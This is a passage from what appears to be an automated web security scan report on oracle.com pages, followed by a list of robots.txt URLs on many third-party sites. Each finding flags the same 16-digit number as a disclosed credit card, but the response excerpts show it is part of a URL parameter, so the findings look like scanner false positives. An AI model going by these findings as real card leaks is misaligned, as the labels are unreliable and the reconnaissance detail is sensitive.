25.83. http://www.oracle.com/us/corporate/pricing/price-lists/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/pricing/price-lists/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/pricing/price-lists/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.84. http://www.oracle.com/us/corporate/profit/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/profit/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/profit/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.85. http://www.oracle.com/us/corporate/publishing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/publishing/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/corporate/publishing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.86. http://www.oracle.com/us/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41041820989036270,0:1)
Date: Tue, 06 Sep 2011 16:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.87. http://www.oracle.com/us/industries/communications/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/communications/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/industries/communications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.88. http://www.oracle.com/us/industries/education-and-research/018753.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/education-and-research/018753.htm

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/industries/education-and-research/018753.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.89. http://www.oracle.com/us/industries/engineering-and-construction/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/engineering-and-construction/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.90. http://www.oracle.com/us/industries/financial-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/financial-services/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/industries/financial-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.91. http://www.oracle.com/us/industries/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/industries/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.92. http://www.oracle.com/us/industries/retail/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/retail/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/industries/retail/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.93. http://www.oracle.com/us/partnerships/solutions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/partnerships/solutions/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/partnerships/solutions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.94. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/partnerships/specialized-showcase-224514.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/partnerships/specialized-showcase-224514.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.95. http://www.oracle.com/us/products/applications/fusion/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/fusion/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/applications/fusion/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.96. http://www.oracle.com/us/products/applications/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/applications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.97. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/jd-edwards-enterpriseone/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.98. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/peoplesoft-enterprise/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

25.99. http://www.oracle.com/us/products/applications/primavera/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/primavera/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/applications/primavera/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.100. http://www.oracle.com/us/products/consulting/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/consulting/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/consulting/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.101. http://www.oracle.com/us/products/database/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/database/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/database/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.102. http://www.oracle.com/us/products/enterprise-manager/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/enterprise-manager/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/enterprise-manager/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.103. http://www.oracle.com/us/products/financing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/financing/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/financing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.104. http://www.oracle.com/us/products/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.105. http://www.oracle.com/us/products/middleware/exalogic/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/middleware/exalogic/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/middleware/exalogic/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.106. http://www.oracle.com/us/products/middleware/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/middleware/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/middleware/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.107. http://www.oracle.com/us/products/ondemand/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/ondemand/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/ondemand/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.108. http://www.oracle.com/us/products/productslist/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/productslist/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/productslist/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.109. http://www.oracle.com/us/products/servers-storage/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/servers-storage/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/servers-storage/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.110. http://www.oracle.com/us/products/servers-storage/solaris/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/servers-storage/solaris/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/servers-storage/solaris/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.111. http://www.oracle.com/us/products/tools/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/tools/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/products/tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.112. http://www.oracle.com/us/social-media/facebook/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/social-media/facebook/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/social-media/facebook/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.113. http://www.oracle.com/us/social-media/linkedin/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/social-media/linkedin/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/social-media/linkedin/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.114. http://www.oracle.com/us/social-media/twitter/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/social-media/twitter/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/social-media/twitter/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.115. http://www.oracle.com/us/solutions/corporate-governance/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/corporate-governance/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/solutions/corporate-governance/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.116. http://www.oracle.com/us/solutions/datawarehousing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/datawarehousing/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/solutions/datawarehousing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.117. http://www.oracle.com/us/solutions/ent-performance-bi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/ent-performance-bi/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/solutions/ent-performance-bi/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.118. http://www.oracle.com/us/solutions/midsize/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/midsize/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/solutions/midsize/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.119. http://www.oracle.com/us/solutions/performance-scalability/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/performance-scalability/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/solutions/performance-scalability/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.120. http://www.oracle.com/us/solutions/solutions-165852.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/solutions-165852.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/solutions/solutions-165852.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.121. http://www.oracle.com/us/sun/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/sun/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/sun/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.122. http://www.oracle.com/us/support/advanced-customer-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/advanced-customer-services/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/advanced-customer-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.123. http://www.oracle.com/us/support/contact-068555.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/contact-068555.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/contact-068555.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.124. http://www.oracle.com/us/support/development-tools-080025.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/development-tools-080025.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/development-tools-080025.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.125. http://www.oracle.com/us/support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.126. http://www.oracle.com/us/support/lifetime-support/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/lifetime-support/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/lifetime-support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.127. http://www.oracle.com/us/support/oracle-support-services-359636.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/oracle-support-services-359636.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/oracle-support-services-359636.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.128. http://www.oracle.com/us/support/policies/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/policies/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/policies/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.129. http://www.oracle.com/us/support/premier/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/premier/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/premier/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.130. http://www.oracle.com/us/support/support-integration/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/support/support-integration/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/support/support-integration/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.131. http://www.oracle.com/us/syndication/subscribe/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/syndication/subscribe/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/syndication/subscribe/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.132. http://www.oracle.com/us/technologies/cloud/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/technologies/cloud/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/technologies/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.133. http://www.oracle.com/us/technologies/java/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/technologies/java/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/technologies/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.134. http://www.oracle.com/us/technologies/virtualization/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/technologies/virtualization/index.html

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

GET /us/technologies/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

25.135. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracleimg.com
Path:	/us/assets/metrics/crossdomain.xml

Issue detail

The following credit card number was disclosed in the response:

4449012242288468

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=23;ecid=41045686459875265,0:1)
Content-Length: 101820
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

26. Robots.txt file previous next
There are 130 instances of this issue:

http://1215.ic-live.com/goat.php
http://4qinvite.4q.iperceptions.com/1.aspx
http://904-kuw-942.mktoresp.com/webevents/visitWebPage
http://a.tribalfusion.com/displayAd.js
http://ad.doubleclick.net/adj/nbcu.cnbc/search
http://ad.yieldmanager.com/pixel
http://adclick.g.doubleclick.net/aclk
http://ads.pointroll.com/PortalServe/
http://adx.g.doubleclick.net/pagead/adview
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js
http://altfarm.mediaplex.com/ad/bk/17353-119518-3840-0
http://api.bizographics.com/v1/profile.redirect
http://api.twitter.com/1/statuses/user_timeline.json
http://assets1.csc.com/home/media/billboard195.swf
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://blog.harbottle.com/dm
http://blogs.oracle.com/otn/
https://bugzilla.mozilla.org/show_bug.cgi
http://c.betrad.com/surly.js
http://c.brightcove.com/services/viewer/federated_f9
http://c.statcounter.com/t.php
http://cdn.gigya.com/JS/socialize.js
http://cdn.krxd.net/config/
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://clickserve.dartsearch.net/link/click
http://clk.fetchback.com/serve/fb/click
http://cm.g.doubleclick.net/pixel
https://cms.paypal.com/us/cgi-bin/
http://cnbc.com/crossdomain.xml
http://content.links.channelintelligence.com/images/blank.gif
http://convctr.overture.com/images/cc/cc.gif
http://d.ads.readwriteweb.com/spcjs.php
http://d1.openx.org/ck.php
http://d7.zedo.com/jsc/d3/fl.js
http://deloitte.12hna.com/preferences/index.php
http://dev.mysql.com/common/js/s_code_remote.js
http://digg.com/submit
https://docs.google.com/
http://download.oracle.com/docs/html/E13982_01/wsassemble.htm
http://edge.sapient.com/assets/images/favicon.ico
http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getCourseDesc
https://education.oracle.com/favicon.ico
http://event.on24.com/r.htm
https://event.on24.com/eventRegistration/prereg/register.jsp
http://events.oracle.com/search/search
http://executivevision.cnbc.com/
http://fls.doubleclick.net/activityi
http://fonts.googleapis.com/css
https://forms.netsuite.com/app/site/crm/externalleadpage.nl
https://forums.oracle.com/forums/style/style.jsp
http://img-cdn.mediaplex.com/0/17353/universal.html
http://imp.fetchback.com/serve/fb/adtag.js
http://intelligence.marykay.com/b/ss/marykaycom,marykayusglobal/1/H.23.3/s11730084258597
http://keywords.fmpub.net/
http://l.addthiscdn.com/live/t00/250lo.gif
http://l.apture.com/v3/
http://legolas.nexac.com/lgalt
http://m.cnbc.com/
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx
http://netsuite-www.baynote.net/baynote/customerstatus2
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Volusion2011test/Retargeting_Homepage_Nonsecure@Bottom3
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://oimg.m.cnbc.com/b/ss/nbcucnbcwapbu,nbcuwapsitebu/5/H.8--WAP/543473694
http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s06181409736163
http://omni.csc.com/b/ss/csccom/1/H.15.1/s04067904318217
http://oracle.112.2o7.net/b/ss/oraclecom,oracleglobal/1/H.23.3/s05522931320592
http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140
http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569
https://oracleus.wingateweb.com/portal/newreg.ww
http://pagead2.googlesyndication.com/pagead/imgad
http://pg.links.channelintelligence.com/pages/CBLJS.asp
http://pg.links.origin.channelintelligence.com/pages/wl.asp
http://pi.pardot.com/analytics
http://pixel.everesttech.net/1688/i
http://pixel.fetchback.com/serve/fb/pdc
http://pixel.mathtag.com/event/img
http://pixel.quantserve.com/pixel
http://r.casalemedia.com/j.gif
http://rd.rlcdn.com/rd
http://reviews.gillettevenus.com/4746/00047400302457/reviews.htm
http://rt.legolas-media.com/lgrt
http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_global.css
http://s0.2mdn.net/3232241/Russell_Headline_728x90b_REV.swf
http://s7.addthis.com/js/addthis_widget.php
http://search.oracle.com/search/search
http://search.twitter.com/search.json
http://services.krxd.net/pixel.gif
https://shop.oracle.com/store/Database
http://speed.pointroll.com/PointRoll/Media/Banners/Lego/893716/superbrick_300x250_flash_r01.swf
http://stats.deloitte.com/b/ss/deloittecomnewplatformprod/1/H.22.1/s09288867821451
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tf.nexac.com/media/1809966/na.html
http://thinkwrap.com/ourfocus/atg-ecommerce-solutions-partner/
http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json
http://wingateweb.112.2o7.net/b/ss/winweboracle/1/H.20.3/s05398456470575
http://wt.infosys.com/dcsompe1g7xywz12f97ensgi0_4h9t/dcs.gif
http://www.actonsoftware.com/acton/bn/1227/visitor.gif
http://www.apture.com/js/apture.js
http://www.atg.com/
https://www.atg.com/service/main.jsp
http://www.beautyproductsdirect.com/
http://www.bigcommerce.com/lp/e1-lp-ecommerce.php
https://www.bigcommerce.com/pci-compliant-shopping-cart-software.php
http://www.bizographics.com/collect/
http://www.cnbc.com/
http://www.csc.com/
http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp
https://www.cvs.com/CVSApp/checkout/rx/rx_new_container.jsp
http://www.deloitte.com/
http://www.facebook.com/extern/login_status.php
http://www.fetchback.com/
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/aclk
http://www.harbottle.com/hnl/pages/hnl.php
http://www.imiclk.com/cgi/r.cgi
http://www.linkedin.com/countserv/count/share
http://www.marykay.com/
http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html
http://www.oracle.com/index.html
